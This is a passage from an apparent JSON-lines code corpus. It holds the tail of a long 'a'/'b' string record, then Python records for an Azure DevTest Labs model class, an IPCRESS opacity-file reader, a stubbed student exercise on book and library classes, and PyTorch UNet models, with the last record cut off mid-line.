bbbbababbbbbbaaababaabbbabbababbaaaaaaabbaabbbbabbbbbaabaababbaabbbbbaaaabababbbbaaaaabbababbababababaababbbbbabbabaaaaabbbbabaabbaabbbabbbbbaaaaabbbaaabbbabbabbbababaaaabbaababababaabababbaabbaabaaaabbbabbbababababbbaabbabbbaababbbaaabababaaaabaababaaaababaabaaaaaaaabababbabaaaabaaabbbbbabaaabaababbbbaaaababaabaaaaababbaaabaabbaaaaababaabaabbabbabbbaababababbbaaababaaaaaabbbbaaaabbabbbbabababaabbaaabbbbaabbaabaaabbbbbaaabbabaababaaabbbaaaabbaaabbbabbbbaabbbabaaabbbabbbababaaabbbbaaabbabbbbbabbaaababbbbbbababbabbbbaaaabaaabbaabbaaabbabbaaaaabaabbabababbbabbabaaabbbaabaaabaaaaabababbbbaaaabbbbabbbaabbababbaababababbbaaababbabaaabababbababbabbabaabaabbbbaaabaabaaabababbabababababbbbaaaaabababbabababaabaaaaaabbbbaabbbaabaabaaaaaaabbaaabbababbaabaabbbaabbaabbbaabaaabbbbaaaababbbbbbbbabbaabababbbaaababbabababbbbbaaabbabbaabbbbaabbabaaaabaaababaabbbaaaabbabbbbbaabbbbbbaaaababbaaabbaabaaabbaabaaababbbaaabbbaaaabbabbaaaaaabaabaabbbabaaaaabbbaaabbbbbbbbbbbaabbbbbbabbaaababbbaaaabbabbaabbaaababaabaaabaabbaaabbbbbaaaaabbbbbbbaababbbbabbbaaabbabaaaabbabbaaaabaaabbaaababbbabbaaaababbbbabbabbabaabbbabbababaaaaabbaabbababaaabababbaaaaaabbbbaaaaabbababbababbbabababbabbbbaabbabbbbbabaabbaabbbabbababbbbababaabbbaabaaabaaaaabbabababaaaaaabaabbbaaabaababababbabbaaabaaabaabbbbabaaaaababaababababbababababbaaaababbabbabbbbbaabbababbbbbaaababbbababbaabbbaaabbbbabbbbbabbbaabbaaabbaabbaababbabaabbababbbbbbabaaabaabbbbabbbbabaaabbaabaabbabbaaaaaaaaaabbbbbbbbabbbaabbbabbbbbbbaababaababbaaaaaababaaabbbbbbaaabbbbbaabaaaababaabaabbbabbabbaaaababaaabaabbaababbbaababbbbaaabababbabbabababaabbbbbbbbbaababbaaaabaaabbbbbaabababbaaaaaaaaabbaabbababbbabbbbbaabaaabbaabbaaabbbaabbaaaababaabbbaabaabbaabbbaabbabbabbaaabaababbbaababaaaabbbaabbbbbabaaabbbbbbaaaaaabbaabbbbbbbbabbbbbbbaaaabbbabaaabbbbabbbbbbabbababaabaaabaabbabaabbababababbaaabbbbbaaabbabaabbabbaaaababbaabaaaaabbbbbbabaaabaaaaaaabbbbabaaaabbbababaabbbabbbbaaaababaababaaabbabbaaaabbabbabbabaaabaabbaaabbbababbabbbababbaabbaaabbaabbbbaaabbbabbbbaaaaabbaaabbabbaaaaaaaababbababbabaababbaaaabbbbaabaababbbbbbbbabbbbabbabaaababbbbaaaaababaaaabaaaabaabbaaaaaabbaabbaabbbbbabaaababbabbbaaabbababaaaaababbabbbbabaaaaabaababababaabbabbaabaaaabaabbbabbababbabbbabababaabbbbabbbbaabaaabaabbbabbaabaaababbbaabaabbabbbbabaaaabbbabbbabbaabbbabbaaababbabaaaabaaaaaabbbabaabababaabaabaabaabbbaaaabaabbaabaabbbbaababaabbbbbabbaabaaabaabbbbabbbbabbaaabbaaabbaaabaaaaaaaabaabaaaabaaababbababbbbaaababbbbababbbaaaabbbbaabbababbbabbaaabbaaaabbbbabbaabaaabbaababaabbaaaabaaaabbaaaaabaababbbabbababbbbababbbbaaabbbbabababbbbabbbbaaaaabbbaabbbaabaaaabaabbabbbaabaababbbbaaabbbbbbaababbbbbaaaaaababbabbbbabababbbabbbabbbaabaabbbbbabbabbbbbaabbbabaaabababaaaaaaabaabababbaaabbaabbbababaaabbaababaaaabbbbaabbbbaaabbbabaaaaaaaabaaabaaabababbaaaaaabaaabbbbbabbabbaabababbababababaaaababbabbaabbabbabaaaabaaabaabbbabaabbbbbaabaababaaabababaabbbabbbbbbbbbbaaababbbbbbababaaaabbaabbbbaabbbababababbbaaaaabbabaaaaabbaaaabababbabaabbabbababbbbbabaaabbbbbbbbbaaabaaababaaaaabaabbaaaabbaabbbbbabbaabaabbaaaababaabbbbbabbbaaabaabbabbaaaabaaaabaaaaaaaabaabbabbbaabbababbbabaaabaabaaabbaababbbababbaabaaaabbabbbbbaaababbaabbaababbaabbbbbbababbabbaabababbbabbbbbbabbbabababbbbabbbaaababbaaabbbaabaaaabaaaabaabbbababbbbbbbbaaababbaabaaabbaaabbbbbabbbabbbababaabaaaaaaaaaabbbbbaabbbabbbbbabbabaabbabbbaabbbbabbabbbaaabbaababbabababaabbbbbaabbbbaabbbabbaaaaaabaabbabbbbbaaababbabbbababbbbbaaabaabbaaaaaabaaaaaabbbaabbaaabaababbaaabbabaabbbaababbaabbbbbbabbbbabaababbbbbaababbabaabbbaaaaabbbbbababbaabbababaabbabbbabbaaaaaabaaabbababbaabbbabbbab
babaabbaaabbaabbbbabbbaaaaaaaaabaabbbbababaababbbbababbbaaabbabbaabbababbaabababaabbaaabaabbababbbaababababbbababaababaaaabbaabbbaabaabbabbaaaaaaaaabbbbbabbbabaaaabbabaaababbaabaababaaabbaabbabbbabbaaabaaabbbbaaabbbabbabababbbbbbbbbaaabaabbaababbabaaaababbbbbababbabaabbabababaaaaababbabaaabbaaabbbbbaabbabbababbaaabbbaabbabaabaababbaaabbbbbaabbaaaaabbaabbbaabbbbabbabbabaaabbbabaaaaaaaababaaaababaaaaababaaaabaaaaaaaaababaabbbababbbbaabaaaaabbbababbabbaabbaaabb\""} {"ext": "py", "sha": "1a30a6aef98eaac5be09a134db30813a4870b88f", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass EnvironmentDeploymentPropertiesFragment(Model):\n \"\"\"Properties of an environment deployment.\n\n :param arm_template_id: The Azure Resource Manager template's identifier.\n :type arm_template_id: str\n :param parameters: The parameters of the Azure Resource Manager template.\n :type parameters:\n list[~azure.mgmt.devtestlabs.models.ArmTemplateParameterPropertiesFragment]\n \"\"\"\n\n _attribute_map = {\n 'arm_template_id': {'key': 'armTemplateId', 'type': 'str'},\n 'parameters': {'key': 'parameters', 'type': '[ArmTemplateParameterPropertiesFragment]'},\n }\n\n def __init__(self, *, arm_template_id: str=None, parameters=None, **kwargs) -> None:\n super(EnvironmentDeploymentPropertiesFragment, self).__init__(**kwargs)\n self.arm_template_id = arm_template_id\n self.parameters = parameters\n"} {"ext": "py", "sha": "1a30a795d92cf0185b07147a9bfe07ccaec7b3a0", "content": "#!/usr/bin/env python\n#-----------------------------*-python-*----------------------------------------#\n# file src/cdi_ipcress/python/ipcress_reader.py\n# author Alex Long \n# date Monday, December 15, 2014, 5:44 pm\n# brief This script has fucntions that parse an IPCRESS file and returns a\n# dictionary that contains data for each property and each material\n# present in the file. This script also contains interpolation functions\n# for opacity data.\n# note Copyright (C) 2016, Triad National Security, LLC.\n# All rights reserved.\n#--------------------------------------------------------------------------------------------------#\n\n# import block\n################################################################################\nimport re\nfrom numpy import arange, sin, pi, min, max\nimport sys\nimport struct\nimport numpy as np\nfrom struct import *\nfrom math import *\n################################################################################\n\n# These are the functions that are used to read data from the\n# binary IPCRESS file. It also contains a function for interpolating in\n# density and temperature. 
The data locations are specified in\n# cdi_ipcress/doc/IPCRESS_File_Format.pdf\n\n################################################################################\ndef get_data_for_id(filename, data_start_index, num_entries):\n temp_grid = []\n # \"rb\" is read binary mode\n with open(filename, \"rb\") as f:\n f.seek(data_start_index*8)\n for i in range(num_entries):\n word = f.read(8)\n temp_grid.append(unpack('>d', word)[0])\n return temp_grid\n################################################################################\n\n\n################################################################################\ndef write_data_for_id(filename, data_start_index, num_entries, new_values):\n # \"wb\" is write binary mode\n with open(filename, \"r+b\") as f:\n f.seek(data_start_index*8)\n for i in range(num_entries):\n s = struct.pack('>d', new_values[i])\n f.write(s)\n################################################################################\n\n################################################################################\ndef interpolate_mg_opacity_data(T_grid, rho_grid, hnu_grid, op_data, \\\n target_rho, target_T, print_str=\"\"):\n n_rho = len(rho_grid)\n n_T = len(T_grid)\n n_hnu = len(hnu_grid)\n\n # don't allow extrapolation\n if (target_rho < np.min(rho_grid)): target_rho = np.min(rho_grid)\n if (target_rho > np.max(rho_grid)): target_rho = np.max(rho_grid)\n if (target_T < np.min(T_grid)): target_T = np.min(T_grid)\n if (target_T > np.max(T_grid)): target_T = np.max(T_grid)\n if (print_str is not None):\n print( \\\n \"Interpolating {0}--Target rho: {1} , target T: {2}\".format( \\\n print_str, target_rho, target_T))\n\n # get correct index of adjacent density points\n rho_L = 1000; rho_G =0\n for rho_i, rho in enumerate(rho_grid[:-1]):\n if ( target_rho >= rho and target_rho<=rho_grid[rho_i+1]):\n rho_L = rho_i\n rho_G = rho_i+1\n break\n\n # get correct index of adjacent temperature points\n T_L = 1000; T_G = 0\n for T_i, T in enumerate(T_grid[:-1]):\n if ( target_T >= T and target_T<=T_grid[T_i+1]):\n T_L = T_i\n T_G = T_i+1\n break\n\n #print(\"Temperature interpolation bounds: {0} {1}\".format(T_grid[T_L], T_grid[T_G]))\n #print(\"Density interpolation bounds: {0} {1}\".format(rho_grid[rho_L], rho_grid[rho_G]))\n\n #get the adjacent rows of the opacity index\n #get the points of the opacity index\n rho_L_T_L = op_data[n_rho*T_L*(n_hnu-1) + rho_L*(n_hnu-1) : n_rho*T_L*(n_hnu-1) + rho_L*(n_hnu-1) + (n_hnu-1) ]\n rho_L_T_G = op_data[n_rho*T_G*(n_hnu-1) + rho_L*(n_hnu-1) : n_rho*T_G*(n_hnu-1) + rho_L*(n_hnu-1) + (n_hnu-1) ]\n rho_G_T_L = op_data[n_rho*T_L*(n_hnu-1) + rho_G*(n_hnu-1) : n_rho*T_L*(n_hnu-1) + rho_G*(n_hnu-1) + (n_hnu-1) ]\n rho_G_T_G = op_data[n_rho*T_G*(n_hnu-1) + rho_G*(n_hnu-1) : n_rho*T_G*(n_hnu-1) + rho_G*(n_hnu-1) + (n_hnu-1) ]\n\n interp_op = []\n #interpolate for each frequency point\n for i in range(n_hnu-1):\n #if (rho_L_T_L[i] < 1.0e-10) or (rho_L_T_G[i] < 1.0e-10) or (rho_G_T_L[i] < 1.0e-10) or (rho_G_T_G[i] < 1.0e10):\n # interp_op.append(1.0e-10)\n #print(\"{0} {1} {2} {3}\" .format(rho_L_T_L[i], rho_L_T_G[i], rho_G_T_L[i], rho_G_T_G[i]))\n log_op_T_L = log(rho_L_T_L[i]) + log(target_rho/rho_grid[rho_L]) / log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_L[i]/rho_L_T_L[i])\n log_op_T_G = log(rho_L_T_G[i]) + log(target_rho/rho_grid[rho_L]) / log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_G[i]/rho_L_T_G[i])\n log_op = log_op_T_L + log(target_T/T_grid[T_L]) / log(T_grid[T_G]/T_grid[T_L]) * (log_op_T_G - log_op_T_L)\n 
interp_op.append(exp(log_op))\n\n print(\"hnu(keV) opacity(sq_cm/g) opacity(1/cm)\")\n for i, hnu in enumerate(hnu_grid[:-1]):\n print(\"{0} {1} {2}\".format( 0.5*(hnu + hnu_grid[i+1]), interp_op[i], interp_op[i]*target_rho))\n return interp_op\n###############################################################################\n\n################################################################################\ndef interpolate_gray_opacity_data(T_grid, rho_grid, op_data, target_rho, \\\n target_T, print_str = \"\"):\n n_rho = len(rho_grid)\n n_T = len(T_grid)\n\n # don't allow extrapolation\n if (target_rho < np.min(rho_grid)): target_rho = np.min(rho_grid)\n if (target_rho > np.max(rho_grid)): target_rho = np.max(rho_grid)\n if (target_T < np.min(T_grid)): target_T = np.min(T_grid)\n if (target_T > np.max(T_grid)): target_T = np.max(T_grid)\n if (print_str is not None):\n print( \\\n \"Interpolating {0}--Target rho: {1} , target T: {2}\".format( \\\n print_str, target_rho, target_T))\n\n rho_L = 1000; rho_G =0\n for rho_i, rho in enumerate(rho_grid[:-1]):\n if ( target_rho >= rho and target_rho<=rho_grid[rho_i+1]):\n rho_L = rho_i\n rho_G = rho_i+1\n break\n\n for T_i, T in enumerate(T_grid[:-1]):\n if ( target_T >= T and target_T<=T_grid[T_i+1]):\n T_L = T_i\n T_G = T_i+1\n break\n\n #get the adjacent rows of the opacity index\n rho_L_T_L = op_data[n_rho*T_L + rho_L]\n rho_L_T_G = op_data[n_rho*T_G + rho_L]\n rho_G_T_L = op_data[n_rho*T_L + rho_G]\n rho_G_T_G = op_data[n_rho*T_G + rho_G]\n\n #interpolate in log space\n #print(\"{0} {1} {2} {3}\" .format(rho_L_T_L, rho_L_T_G, rho_G_T_L, rho_G_T_G))\n log_op_T_L = log(rho_L_T_L) + log(target_rho/rho_grid[rho_L]) / log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_L/rho_L_T_L)\n log_op_T_G = log(rho_L_T_G) + log(target_rho/rho_grid[rho_L]) / \\\n log(rho_grid[rho_G]/rho_grid[rho_L]) * log(rho_G_T_G/rho_L_T_G)\n log_op = log_op_T_L + log(target_T/T_grid[T_L]) / \\\n log(T_grid[T_G]/T_grid[T_L]) * (log_op_T_G - log_op_T_L)\n interp_op = exp(log_op)\n\n #print(\"opacity(sq_cm/g) opacity(1/cm)\")\n #print(\"{0} {1}\".format(interp_op, interp_op*target_rho))\n return interp_op\n###############################################################################\n\n\n\n###############################################################################\ndef read_information_from_file(ipcress_file):\n\n word_array = []\n with open(ipcress_file, \"rb\") as f:\n for i in range(26):\n word = f.read(8)\n if not word:\n break\n word_array.append(word)\n #print(int(unpack('>d', word)[0]))\n\n title = word_array[0]\n toc_int= []\n offset = 2\n for i in range(offset,offset+24):\n toc_int.append( int(unpack('>d', word_array[i])[0]))\n\n n_data_records = toc_int[14]\n mxrec = toc_int[1] - toc_int[0]\n mxkey = toc_int[16]\n #print(\"Number of data records: {0}\".format(n_data_records))\n #print(\"Beginnging of data: {0}\".format(toc_int[0]))\n #print(\"Max records: {0} , max search keys: {1}\".format(mxrec, mxkey))\n\n mat_property = []\n\n ds = []\n dfo = []\n tdf = []\n num_mats = 0\n mat_ids= []\n with open(ipcress_file, \"rb\") as f:\n # Read in array that lists the data sizes in this file\n f.seek(toc_int[0]*8)\n #print(\"Table of data sizes\")\n for i in range(n_data_records):\n word = f.read(8)\n ds.append(int(unpack('>d', word)[0]))\n\n # Read in array gives the offsets between data\n f.seek(toc_int[1]*8)\n #print(\"Table of data file offesets\")\n for i in range(n_data_records):\n word = f.read(8)\n dfo.append(int(unpack('>d', word)[0]))\n\n # Read in material 
IDs present in this file\n f.seek(dfo[0]*8)\n #print(\"Table of material identifiers\")\n word = f.read(8)\n num_mats = int(unpack('>d', word)[0])\n for i in range(num_mats):\n word = f.read(8)\n mat_ids.append( int(unpack('>d', word)[0]))\n\n # Read in list of properties in this file available for each material\n # entries in this table are 24 bytes each\n f.seek(toc_int[10]*8)\n #print(\"Table of data fields for each material\")\n word = f.read(72) #ignore the first 72 bytes, they don't contain useful information\n for i in range(1,toc_int[14]):\n #oredering is \"matID\" \"data type\" \"fill\"\n temp_property = []\n for j in range(mxkey):\n three_string = []\n three_string.append( f.read(8).decode(\"utf-8\"))\n three_string.append( f.read(8).decode(\"utf-8\"))\n three_string.append( f.read(8).decode(\"utf-8\"))\n if (j==0): temp_property.append(three_string[2].strip() )\n elif (j==1): temp_property.append(three_string[0].strip())\n else: temp_property.append(i) #index of data table containing values\n try:\n temp_property = [temp_property[0].decode('ascii'), \\\n temp_property[1].decode('ascii'), temp_property[2]]\n mat_property.append(temp_property)\n except:\n mat_property.append(temp_property)\n\n materials = []\n for m in range(num_mats):\n materials.append([ m, mat_ids[m]])\n\n #print(\"{0} materials in file\".format(num_mats))\n #for i in range(num_mats):\n # print(\" Matieral ID: {0}\".format(mat_ids[i]))\n\n #print(\"List of available properties\")\n #for i in property:\n # print(i)\n\n #return the list of available properties, data file offsets and data sizes\n return materials, mat_property, dfo, ds\n################################################################################\n\n\n###############################################################################\ndef write_information_to_file(ipcress_file, material_ID, mat_property, new_values):\n materials, property_list, dfo, ds = read_information_from_file(ipcress_file)\n # check to make sure material is in file\n material_IDs = []\n for imat in materials:\n material_IDs.append(str(imat[1]))\n if (not (material_ID in material_IDs)):\n print(\"ERROR: Material ID not found in file, not changing anything!\")\n return\n\n # try to find property in file\n property_found = False\n propery_index = 0\n for prop_i, prop in enumerate(property_list):\n if (material_ID == prop[0] and mat_property == prop[1]):\n property_found = True\n property_index = prop_i\n break\n\n # make sure sizes match of property you're about to write\n if (property_found and ds[property_index+1] != len(new_values)):\n print(\"ERROR: Number of new values does not match size of old values, not changing anything!\")\n return\n\n # if the combination of property and material was found, write the new data to\n # the ipcress file\n if property_found:\n write_data_for_id( ipcress_file, dfo[property_index+1], \\\n ds[property_index+1], new_values)\n else:\n print(\"ERROR: Combination of material ID and property not found, not changing anything!\")\n return\n################################################################################\n\n\n\n################################################################################\n# Checks to see if there are any zeros in the opcaity data--zero data is\n# difficult to handle and for now we are going to ignore data sets that contain\n# zeros and print an error message\ndef check_valid_data(opacity_grid):\n for item in opacity_grid:\n if (item != 0.0):\n return True\n return 
False\n################################################################################\n\n################################################################################\n# return a dictionary where the keys are \"_\" and the\n# values are the data\ndef get_property_map_from_ipcress_file(ipcress_file):\n #load data from IPCRESS file\n # dfo is the array of data file offsets, ds is the array of data sizes\n materials, property_list, dfo, ds = read_information_from_file(ipcress_file)\n\n #build dictionary of data, keys are \"property_matID\"\n table_key_dict = {}\n for prop_i, prop in enumerate(property_list):\n table_key_dict[\"{0}_{1}\".format(prop[1], prop[0])] = get_data_for_id( ipcress_file, dfo[prop_i+1], ds[prop_i+1])\n\n material_list = []\n for material in materials:\n material_list.append(material[1])\n\n return table_key_dict, material_list\n\n################################################################################\n"} {"ext": "py", "sha": "1a30a820b5fa268f1fe1bc7abb983951f9ee730a", "content": "# START LAB EXERCISE 9\nprint('LAB EXERCISE 09 \\n')\n\n# PROBLEM 1 (4 Points)\n\nclass Book(): \n \"\"\"\n This is a class that contains information on Books.\n\n Attributes:\n title (str): The title of the book.\n author (str): The name of the author.\n\n \"\"\"\n def __init__(self, title, author): \n \"\"\"\n The constructor of the class. Here you will need to create\n the instance variables that were described in the docstring above. \n Note that the attributes are defined by parameters passed to this constructor method.\n \n Parameters:\n title (str): The title of the book.\n author (str): The name of the author.\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n\n def __str__(self):\n \"\"\"\n String method for the class. Whenever an instance of is passed to the \n str() or print() functions, the string from this method will be returned.\n\n Parameters:\n None\n\n Returns:\n str: A string representation of instance in the format \" by <author>\"\n \"\"\"\n pass # Implement\n\n# PROBLEM 2 (4 Points)\n\nclass Library():\n \"\"\"\n This is a class that contains information on a Library.\n\n Attributes:\n books (list): List of book instances in the library.\n torn_pages_tolerance (int): Number of torn pages a book can have and the library will still accept.\n\n \"\"\"\n def __init__(self):\n \"\"\"\n The constructor of the <Library> class. Here you will need to create instance variables\n described in the docstring above. 
The Library constructor should take NO positional arguments, but\n set instance variables <books> to an empty list and <torn_pages_tolerance> to 3.\n \n Parameters:\n None\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n\n def __str__(self):\n \"\"\"\n String method for the <Library> class.\n\n Parameters:\n None\n\n Returns:\n str: A string representation of <Book> instance in the format:\n \"This library contains <number of books> books\"\n \n \"\"\"\n\n pass # Implement\n\n# PROBLEM 3 (2 Points)\n\n def will_accept(self, book):\n \"\"\"\n Determines if the library will add a book instance to its collection\n depending on its conditions.\n\n if book instance is of Book class, return True.\n if book instance is of PaperbackBook class and the number of torn pages \n is less than or equal to the library's torn page tolerance, return True.\n else return False.\n HINT: there is a built-in isinstance() function to check what class an isntance\n came from\n\n Parameters:\n book: instance of any book class\n\n Returns:\n Boolean (True or False)\n \"\"\"\n\n pass # Implement\n\n# PROBLEM 4 (2 Points)\n\n def add_book(self, book):\n \"\"\"\n This method will modify the <books> attribute by appending the parameter <book>\n to it if the library will accept the book.\n HINT: call will_accept within this method to determine if book can be added\n\n Parameters:\n book: instance of any book class\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n# PROBLEM 5 (2 Points)\n\nclass PaperbackBook(Book): # <- remember to fill in () for class inheritence!\n \"\"\"\n This is a PaperbackBook class that inherits from the Book class. It will inherit\n all attributes and methods from Book. You will overwrite the parent constructor \n to add an additional property but inherit the string method as is.\n\n Attributes:\n title (str): The title of the book.\n author (str): The name of the author.\n num_torn_pages (int): The number of torn pages in the PaperBook.\n \n \"\"\"\n\n def __init__(self, title, author):\n \"\"\"\n The constructor of the <PaperbackBook> class. Here you will need to inherit the attributes \n from the parent class, but add an additional instance variable <num_torn_pages> \n and initialize it to 0. 
Note that the constructor takes two positional arguments, but will\n set three instance variables.\n \n Parameters:\n title (str): The title of the book.\n author (str): The name of the author.\n\n Returns:\n None\n \"\"\"\n\n pass # Implement\n\n# PROBLEM 6 (2 Points)\n\n def rip_page(self):\n \"\"\"\n This method will modify the <num_torn_pages> and increase it by one every time the\n method is called.\n\n Parameters:\n None\n\n Returns:\n None\n \"\"\"\n pass # Implement\n\n# PROBLEM 7 (4 Points)\n \ndef main():\n\n # 7.1 Create an instance of <Book>\n\n homer_odyssey = None\n\n # print instance of book\n print(homer_odyssey)\n\n # 7.2 Create an instance of <PaperbackBook>\n\n angelou_rise = None\n\n # print instance of PaperbackBook\n print(angelou_rise)\n\n # 7.3 Create an instance of <Library>\n\n lib = None\n\n # 7.4 Add book to the library\n\n pass # Implement\n\n # 7.5 Increase number of torn pages\n\n pass # Implement\n\n # 7.6 Set number of torn pages\n\n torn_pages = None\n\n # 7.7 Try to add Paperbook to the library\n\n pass # Implement\n\n # 7.8 Print out the library's books\n\n pass # Implement\n\n# END CODING HERE - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a30a83ced3787d7f087096cf104b361b32f2463", "content": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as f\nfrom torch.nn import init\nfrom .submodules import ConvLayer, UpsampleConvLayer, TransposedConvLayer, RecurrentConvLayer, ResidualBlock, ConvLSTM, ConvGRU, RecurrentResidualLayer\n\n\ndef skip_concat(x1, x2):\n return torch.cat([x1, x2], dim=1)\n\n\ndef skip_sum(x1, x2):\n return x1 + x2\n\n\nclass BaseUNet(nn.Module):\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum', activation='sigmoid',\n num_encoders=4, base_num_channels=32, num_residual_blocks=2, norm=None, use_upsample_conv=True):\n super(BaseUNet, self).__init__()\n\n self.num_input_channels = num_input_channels\n self.num_output_channels = num_output_channels\n self.skip_type = skip_type\n self.apply_skip_connection = skip_sum if self.skip_type == 'sum' else skip_concat\n self.activation = activation\n self.norm = norm\n\n if use_upsample_conv:\n print('Using UpsampleConvLayer (slow, but no checkerboard artefacts)')\n self.UpsampleLayer = UpsampleConvLayer\n else:\n print('Using TransposedConvLayer (fast, with checkerboard artefacts)')\n self.UpsampleLayer = TransposedConvLayer\n\n self.num_encoders = num_encoders\n self.base_num_channels = base_num_channels\n self.num_residual_blocks = num_residual_blocks\n self.max_num_channels = self.base_num_channels * pow(2, self.num_encoders)\n\n assert(self.num_input_channels > 0)\n assert(self.num_output_channels > 0)\n\n self.encoder_input_sizes = []\n for i in range(self.num_encoders):\n self.encoder_input_sizes.append(self.base_num_channels * pow(2, i))\n\n self.encoder_output_sizes = [self.base_num_channels * pow(2, i + 1) for i in range(self.num_encoders)]\n\n self.activation = getattr(torch, self.activation, 'sigmoid')\n\n def build_resblocks(self):\n self.resblocks = nn.ModuleList()\n for i in range(self.num_residual_blocks):\n self.resblocks.append(ResidualBlock(self.max_num_channels, self.max_num_channels, norm=self.norm))\n\n def build_decoders(self):\n decoder_input_sizes = list(reversed([self.base_num_channels * pow(2, i + 1) for i in range(self.num_encoders)]))\n\n self.decoders = nn.ModuleList()\n for input_size in decoder_input_sizes:\n 
self.decoders.append(self.UpsampleLayer(input_size if self.skip_type == 'sum' else 2 * input_size,\n input_size // 2,\n kernel_size=5, padding=2, norm=self.norm))\n\n def build_prediction_layer(self):\n self.pred = ConvLayer(self.base_num_channels if self.skip_type == 'sum' else 2 * self.base_num_channels,\n self.num_output_channels, 1, activation=None, norm=self.norm)\n\n\nclass UNet(BaseUNet):\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum', activation='sigmoid',\n num_encoders=4, base_num_channels=32, num_residual_blocks=2, norm=None, use_upsample_conv=True):\n super(UNet, self).__init__(num_input_channels, num_output_channels, skip_type, activation,\n num_encoders, base_num_channels, num_residual_blocks, norm, use_upsample_conv)\n\n self.head = ConvLayer(self.num_input_channels, self.base_num_channels,\n kernel_size=5, stride=1, padding=2) # N x C x H x W -> N x 32 x H x W\n\n self.encoders = nn.ModuleList()\n for input_size, output_size in zip(self.encoder_input_sizes, self.encoder_output_sizes):\n self.encoders.append(ConvLayer(input_size, output_size, kernel_size=5,\n stride=2, padding=2, norm=self.norm))\n\n self.build_resblocks()\n self.build_decoders()\n self.build_prediction_layer()\n\n def forward(self, x):\n \"\"\"\n :param x: N x num_input_channels x H x W\n :return: N x num_output_channels x H x W\n \"\"\"\n\n # head\n x = self.head(x)\n head = x\n\n # encoder\n blocks = []\n for i, encoder in enumerate(self.encoders):\n x = encoder(x)\n blocks.append(x)\n\n # residual blocks\n for resblock in self.resblocks:\n x = resblock(x)\n\n # decoder\n for i, decoder in enumerate(self.decoders):\n x = decoder(self.apply_skip_connection(x, blocks[self.num_encoders - i - 1]))\n\n img = self.activation(self.pred(self.apply_skip_connection(x, head)))\n\n return img\n\n\nclass UNetRecurrent(BaseUNet):\n \"\"\"\n Recurrent UNet architecture where every encoder is followed by a recurrent convolutional block,\n such as a ConvLSTM or a ConvGRU.\n Symmetric, skip connections on every encoding layer.\n \"\"\"\n\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum',\n recurrent_block_type='convlstm', activation='sigmoid', num_encoders=4, base_num_channels=32,\n num_residual_blocks=2, norm=None, use_upsample_conv=True):\n super(UNetRecurrent, self).__init__(num_input_channels, num_output_channels, skip_type, activation,\n num_encoders, base_num_channels, num_residual_blocks, norm,\n use_upsample_conv)\n\n self.head = ConvLayer(self.num_input_channels, self.base_num_channels,\n kernel_size=5, stride=1, padding=2) # N x C x H x W -> N x 32 x H x W\n\n self.encoders = nn.ModuleList()\n for input_size, output_size in zip(self.encoder_input_sizes, self.encoder_output_sizes):\n self.encoders.append(RecurrentConvLayer(input_size, output_size,\n kernel_size=5, stride=2, padding=2,\n recurrent_block_type=recurrent_block_type,\n norm=self.norm))\n\n self.build_resblocks()\n self.build_decoders()\n self.build_prediction_layer()\n\n def forward(self, x, prev_states):\n \"\"\"\n :param x: N x num_input_channels x H x W\n :param prev_states: previous LSTM states for every encoder layer\n :return: N x num_output_channels x H x W\n \"\"\"\n\n # head\n x = self.head(x)\n head = x\n\n if prev_states is None:\n prev_states = [None] * self.num_encoders\n\n # encoder\n blocks = []\n states = []\n for i, encoder in enumerate(self.encoders):\n x, state = encoder(x, prev_states[i])\n blocks.append(x)\n states.append(state)\n\n # residual blocks\n for resblock in 
self.resblocks:\n x = resblock(x)\n\n # decoder\n for i, decoder in enumerate(self.decoders):\n x = decoder(self.apply_skip_connection(x, blocks[self.num_encoders - i - 1]))\n\n # tail\n img = self.activation(self.pred(self.apply_skip_connection(x, head)))\n\n return img, states\n\n\nclass UNetFire(BaseUNet):\n \"\"\"\n \"\"\"\n\n def __init__(self, num_input_channels, num_output_channels=1, skip_type='sum',\n recurrent_block_type='convgru', base_num_channels=16,\n num_residual_blocks=2, norm=None, kernel_size=3,\n recurrent_blocks={'resblock': [0]}):\n super(UNetFire, self).__init__(num_input_channels=num_input_channels,\n num_output_channels=num_output_channels,\n skip_type=skip_type,\n base_num_channels=base_num_channels,\n num_residual_blocks=num_residual_blocks,\n norm=norm)\n self.kernel_size = kernel_size\n self.recurrent_blocks = recurrent_blocks\n print(self.num_input_channels)\n self.head = RecurrentConvLayer(self.num_input_channels,\n self.base_num_channels,\n kernel_size=self.kernel_size,\n padding=self.kernel_size // 2,\n recurrent_block_type=recurrent_block_type,\n norm=self.norm)\n self.num_recurrent_units = 1\n self.resblocks = nn.ModuleList()\n recurrent_indices = self.recurrent_blocks.get('resblock', [])\n for i in range(self.num_residual_blocks):\n if i in recurrent_indices or -1 in recurrent_indices:\n self.resblocks.append(RecurrentResidualLayer(\n in_channels=self.base_num_channels,\n out_channels=self.base_num_channels,\n recurrent_block_type=recurrent_block_type,\n norm=self.norm))\n self.num_recurrent_units += 1\n else:\n self.resblocks.append(ResidualBlock(self.base_num_channels,\n self.base_num_channels,\n norm=self.norm))\n\n self.pred = ConvLayer(2 * self.base_num_channels if self.skip_type == 'concat' else self.base_num_channels,\n self.num_output_channels, kernel_size=1, padding=0, activation=None, norm=None)\n\n def forward(self, x, prev_states):\n \"\"\"\n :param x: N x num_input_channels x H x W\n :param prev_states: previous LSTM states for every encoder layer\n :return: N x num_output_channels x H x W\n \"\"\"\n\n if prev_states is None:\n prev_states = [None] * (self.num_recurrent_units)\n\n states = []\n state_idx = 0\n\n # head\n x, state = self.head(x, prev_states[state_idx])\n state_idx += 1\n states.append(state)\n\n # residual blocks\n recurrent_indices = self.recurrent_blocks.get('resblock', [])\n for i, resblock in enumerate(self.resblocks):\n if i in recurrent_indices 